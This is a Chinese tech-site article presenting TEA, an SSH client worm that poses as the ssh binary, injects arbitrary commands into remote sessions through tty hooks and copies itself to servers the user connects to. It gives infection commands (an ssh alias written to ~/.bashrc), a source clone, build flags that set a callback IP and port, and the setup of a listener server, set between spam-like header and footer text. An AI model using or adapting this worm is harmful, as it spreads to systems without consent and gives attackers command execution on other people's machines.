91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

TEA是什么

發布時間:2021-12-26 10:46:19 來源:億速云 閱讀:219 作者:小新 欄目:網絡安全

這篇文章給大家分享的是有關TEA是什么的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

TEA是一款基于TAS框架的SSH客戶端蠕蟲,從本質上說,它是一個仿冒的SSH客戶端,它能夠修改tty輸入/輸出來實現任意命令執行,或通過SSH連接來上傳自身以實現滲透感染。

為了實現該工具的正常功能,遠程主機需要滿足以下條件:

1、在登錄時顯示“Last login”信息;

2、dd和stty;

3、目標用戶使用Bash作為默認Shell;

4、可運行fakessh代碼;

5、~/.bashrc可寫入;

感染本地主機:

mkdir ~/.sshwormcp ssh ~/.sshwormalias ssh='~/.sshworm/ssh'

我們首次執行fakessh時,并不會顯示任何內容,工具會執行post-install.c中的代碼,并將字符串alias ssh="~/.sshworm/ssh"寫入到~/.bashrc中:

$ ssh$ sshusage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface][-b bind_address] [-c cipher_spec] [-D [bind_address:]port][-E log_file] [-e escape_char] [-F configfile] [-I pkcs11][-i identity_file] [-J [user@]host[:port]] [-L address][-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port][-Q query_option] [-R address] [-S ctl_path] [-W host:port][-w local_tun[:remote_tun]] destination [command]

實現傳播和感染

我們只需要連接到目標SSH服務器,并且服務器滿足TEA運行條件的話,目標設備以及連接至目標設備的主機就可以成功被感染。

tty修改:

Fakessh執行之后,它將會等到字符串“Last login”來開啟I/O修改(output-hooks.c),當接收到“Last login”之后,它將會發送一些任意指令(inject-cmd.c),然后等待命令執行的結果(output-hooks.c)。如果遠程設備中不存在文件~/.sshworm/ssh的話,蠕蟲將會上傳自身(upload.c)。

卸載:

$ rm -rf ~/.sshworm$ perl -i -pe 's;alias ssh="~/.sshworm/ssh";;g' ~/.bashrc$ unalias ssh

編譯

我建議大家使用musl-libc,或其他的libc,但我不建議大家使用glibc,因為使用glibc編譯的代碼會非常大。

獲取源碼:

$ git clone --recurse-submodules https://github.com/hc0d3r/tea

構建選項:

名稱介紹
IP遠程IPv4 連接
PORT遠程port 連接

樣例:

$ make CC=musl-gcc IP=my-ipv4 PORT=1234

服務器

這里我們制作了一個簡單的服務器來處理鏈接,當post-install.c的代碼被執行之后,服務器將會接收到鏈接。服務器機制非常簡單,當新鏈接建立成功之后,它將會執行一條新的命令并通過命令行傳遞鏈接文件描述符,這樣才能保證執行的程序能夠處理鏈接。

編譯:

$ cd server$ makecc -Wall -Wextra -O3 -c net.c -o net.occ -Wall -Wextra -O3 -c replace.c -o replace.occ -Wall -Wextra -O3 -c term.c -o term.occ -Wall -Wextra -O3 -c main.c -o main.occ -Wall -Wextra -O3 -o server net.o replace.o term.o main.o

工具演示

TEA是什么

感謝各位的閱讀!關于“TEA是什么”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

tea
AI

荔浦县| 贞丰县| 金山区| 资阳市| 墨竹工卡县| 神木县| 新丰县| 齐齐哈尔市| 建瓯市| 巴里| 图木舒克市| 永定县| 长汀县| 新和县| 陆丰市| 泰安市| 时尚| 莲花县| 阳春市| 佛学| 赤峰市| 钟山县| 永昌县| 清徐县| 靖宇县| 惠州市| 古蔺县| 晴隆县| 铜鼓县| 大新县| 图木舒克市| 磐安县| 依安县| 保定市| 恭城| 新营市| 平泉县| 林州市| 怀来县| 蓬溪县| 海淀区|